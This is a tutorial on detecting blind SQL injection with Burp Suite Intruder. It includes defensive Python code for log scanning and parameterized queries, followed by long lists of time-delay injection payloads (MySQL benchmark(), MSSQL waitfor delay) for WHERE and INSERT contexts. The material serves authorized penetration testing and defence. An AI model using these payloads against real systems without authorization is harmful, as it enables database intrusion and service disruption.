Blind SQL Injection detection with Burp Suite


1. Introduction

Burp Suite is a local proxy (a man-in-the-middle application) that helps a penetration tester perform deep analysis and security checks of the HTTP conversation between a browser and a web application. Burp Suite ships with many useful modules such as Spider, Repeater, Scanner and Decoder for this job.

The module we focus on here is called Intruder. With this module you can run customised attacks against a web application by sending multiple payload types at multiple positions inside the headers or body of an HTTP request, and quickly check the responses for the information you are looking for.

This article provides some interesting SQL payloads that you can use with the Intruder module of Burp Suite.

Warning: do not use this tutorial against web applications you do not own or for which you have no authorization from the responsible party.

2. SQL Injection detection

As you know, detecting an SQL injection issue "manually" can be easy. That is not always true for an "automatic" vulnerability scanner. That is why we would like to give such vulnerabilities a second chance to be detected, with smart "customized attacks" in Burp Suite.

In order to find SQL injection issues behind specific parameters of a page, we simply use some common time-consuming SQL statements such as "waitfor delay" (for MS-SQL) and "benchmark()" (for MySQL), and sort the HTTP responses by "Response Time Completed". This way we can quickly find the interesting responses in the list.
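The same sort-by-response-time heuristic, seen from the server side: the script below is an added example (not code from the original article) that reads access-log lines carrying a per-request elapsed time, URL-decodes each query parameter, matches the decoded values against the delay primitives named above (benchmark(), waitfor delay, plus MySQL's sleep()), and also reports any request whose response time alone crosses a threshold, listing results slowest first as the Intruder table does once sorted. The log lines, the log format with a trailing milliseconds field, and the 5000 ms threshold are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (not from the article). Format assumed here:
# Combined-Log prefix followed by one extra field, the response time in ms
# (as nginx's $request_time or Apache's %D could supply). The third line
# mirrors the article's request 27 in URL-encoded form; the fourth is an MSSQL
# probe against what is, in this story, a MySQL backend, so it causes no delay.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /user.php?id=1 HTTP/1.1" 200 512 41
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /user.php?id=1' HTTP/1.1" 500 0 38
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /user.php?id=1%22)%20and%200=benchmark(3000000,MD5(1))%20%23 HTTP/1.1" 200 512 17342
10.0.0.5 - - [10/Oct/2023:13:55:58 +0000] "GET /user.php?id=1)%20waitfor%20delay%20'0:0:20'%20-- HTTP/1.1" 200 512 44
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /user.php?id=2 HTTP/1.1" 200 498 39
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# Delay primitives used by the article's payload lists (MySQL benchmark(),
# MSSQL waitfor delay) plus MySQL sleep(); matched after URL-decoding so that
# %20 / %23 encodings do not hide them.
TIME_SIG_RE = re.compile(r"benchmark\s*\(|waitfor\s+delay|\bsleep\s*\(", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict; query parameters are URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    parts = urlsplit(d["target"])
    # parse_qsl splits each pair on the first '=' only, so an '=' inside the
    # payload (0=benchmark) stays in the value; it also decodes %XX and '+'.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"ip": d["ip"], "path": parts.path, "status": int(d["status"]),
            "ms": int(d["ms"]), "params": params}


def find_probes(log_text, slow_ms=5000):
    """Return suspicious requests, slowest first, each with the reasons it was flagged.

    Two independent signals: a decoded parameter value containing a delay
    primitive (this also catches probes that failed, like an MSSQL payload sent
    to MySQL), and a response time at or above slow_ms (this catches a delay
    primitive the regex does not know). The threshold is an assumption; tune it
    to the site's own latency distribution.
    """
    findings = []
    for ev in (parse_line(l) for l in log_text.splitlines()):
        if ev is None:
            continue
        reasons = [f"delay primitive in parameter {name!r}: {value!r}"
                   for name, value in ev["params"] if TIME_SIG_RE.search(value)]
        if ev["ms"] >= slow_ms:
            reasons.append(f"response time {ev['ms']} ms >= {slow_ms} ms")
        if reasons:
            findings.append({"ip": ev["ip"], "path": ev["path"],
                             "status": ev["status"], "ms": ev["ms"], "reasons": reasons})
    # Same ordering Burp's "Response completed" column gives once sorted.
    findings.sort(key=lambda f: f["ms"], reverse=True)
    return findings


if __name__ == "__main__":
    for f in find_probes(SAMPLE_LOG):
        print(f"{f['ms']:>6} ms  {f['ip']}  {f['path']}")
        for r in f["reasons"]:
            print("          -", r)
```

Decoding before matching is the important step: the article's payload files carry `%20` and `%23` so that the request line stays valid, and a rule that looks for a literal `#` or a space in the raw URL would miss them. The second signal, latency alone, is what makes the Intruder heuristic work in the first place, and the same number is what a defender should alert on.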


3. Burp Suite example

This is a short example of blind SQL injection detection with Burp Suite (we assume you already have some knowledge of Burp Suite usage; if not, enjoy discovering this tool).

First, we send a recorded HTTP request to the Intruder module and set up the position where the payload will be injected (shown in red in the screenshot).




Next, we load our payload list (see next section) from a text file. These payloads use the benchmark() MySQL function and ask the server to compute MD5(1) 3,000,000 times in order to delay the response.

Important: add a white space to the list "URL-encode these characters" (at the bottom of the page) if there is not one already; otherwise the spaces in the payloads are sent raw.

Then we start the attack (see the Intruder menu).

When it has finished, the responses are displayed in a table. Here we have sorted the results by "Response completed" to see immediately which payloads triggered the vulnerability.




As you can see in the previous screenshot, request 27 took more than 17 seconds to complete, with the following payload:

") and 0=benchmark(3000000,MD5(1)) #

The complete SQL statement was:

SELECT * FROM user WHERE id=("1") AND 0=benchmark(3000000,MD5(1)) # OR mid="1"
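The statement above exists because the request parameter is pasted into SQL text. As an added example (not code from the original article), the block below reproduces that construction from an assumed template, shows what survives once MySQL's # comment discards the tail, and puts the parameterized form of the same lookup beside it. The parameterized lookup runs against a constructed in-memory SQLite table; the string-built query is only shown, never executed, since benchmark() is MySQL-only.

```python
import sqlite3

# The payload the article reports for request 27 (MySQL double-quoted string context).
ARTICLE_PAYLOAD = '") and 0=benchmark(3000000,MD5(1)) #'


def build_query_unsafe(user_id):
    """Assumed template behind the article's statement: the value is pasted into
    the SQL text, so the closing quote/parenthesis and the trailing '#' in the
    value become part of the statement (on MySQL, '#' comments out the rest)."""
    return f'SELECT * FROM user WHERE id=("{user_id}")'


def effective_statement_mysql(query):
    """What MySQL actually parses once a '#' comment swallows the tail.
    Simplified on purpose: a '#' inside a string literal would not start a comment."""
    return query.split("#", 1)[0].rstrip()


def make_db():
    """Constructed in-memory table standing in for the article's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id TEXT, mid TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", [("1", "1"), ("2", "7")])
    return conn


def lookup_safe(conn, user_id):
    """Same lookup with a bound parameter: the value travels as data, never as
    SQL text, so quotes, parentheses and comment markers in it change nothing."""
    return conn.execute("SELECT id, mid FROM user WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    injected = "1" + ARTICLE_PAYLOAD
    print("string-built :", build_query_unsafe(injected))
    print("MySQL parses :", effective_statement_mysql(build_query_unsafe(injected)))
    conn = make_db()
    print("parameterized, id='1'    :", lookup_safe(conn, "1"))
    print("parameterized, id=payload:", lookup_safe(conn, injected))
```

With the bound parameter the whole string, including `") and 0=benchmark(...) #`, is compared as one literal id value and matches no row, so an Intruder run against that endpoint would show no response-time difference between payloads. That is the check to repeat after a fix: the payload that once took 17 seconds must complete as fast as a plain id.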

 

4. SQL injection entry points

Because there are so many ways to write an SQL statement, we cannot provide an exhaustive list of payloads for every kind of SQL command and injection issue. We will try to build a good list of valid SQL payloads for the following statements:

4.1. WHERE/ASSIGNMENT

Which should match statements such as (payload marks the injection point):

SELECT a FROM tbl WHERE item=x payload
DELETE FROM tbl WHERE item=x payload
UPDATE tbl SET item1=x payload1 WHERE item2=x payload2
4.2. INSERT/UPDATE

Which should match statements such as:

INSERT INTO tbl(a,b,c) VALUES(x payload1, y payload2 )
UPDATE tbl(a,b) SET VALUES(x payload1, y payload2) WHERE item=value
4.3. ORDER BY/ASC/DESC

Which should match statements such as:

SELECT a FROM tbl <WHERE ...> ORDER BY value,payload1 ASC,payload2

5. The Payloads

So far we focus on MSSQL (using the "waitfor delay" command to introduce a time delay) and MySQL (using the benchmark() function to generate long CPU activity).

For each injection, we:

  • use a quote, double-quote, parenthesis or blank character to close whatever is written before the injected payload.
  • play with multiple levels of parentheses.
  • end the SQL statement with { /* , -- } for MSSQL, and { /* , -- , # } for MySQL.
  • for INSERT only: try different numbers of columns for VALUES().

5.1. Download

Download the full list of payloads: payloads-sql-blind.tar.gz

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt
payloads-sql-blind-MSSQL-WHERE.txt
payloads-sql-blind-MySQL-INSERT.txt
payloads-sql-blind-MySQL-WHERE.txt
payloads-sql-blind-MySQL-ORDER_BY.txt

 

payloads-sql-blind-MSSQL-INSERT.txt

)%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

payloads-sql-blind-MSSQL-WHERE.txt

 waitfor delay '0:0:20' /*
waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
') waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
") waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
')) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
'))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
')))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
")))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --

payloads-sql-blind-MySQL-INSERT.txt

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

payloads-sql-blind-MySQL-WHERE.txt

 and 0=benchmark(3000000,MD5(1))%20/*
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
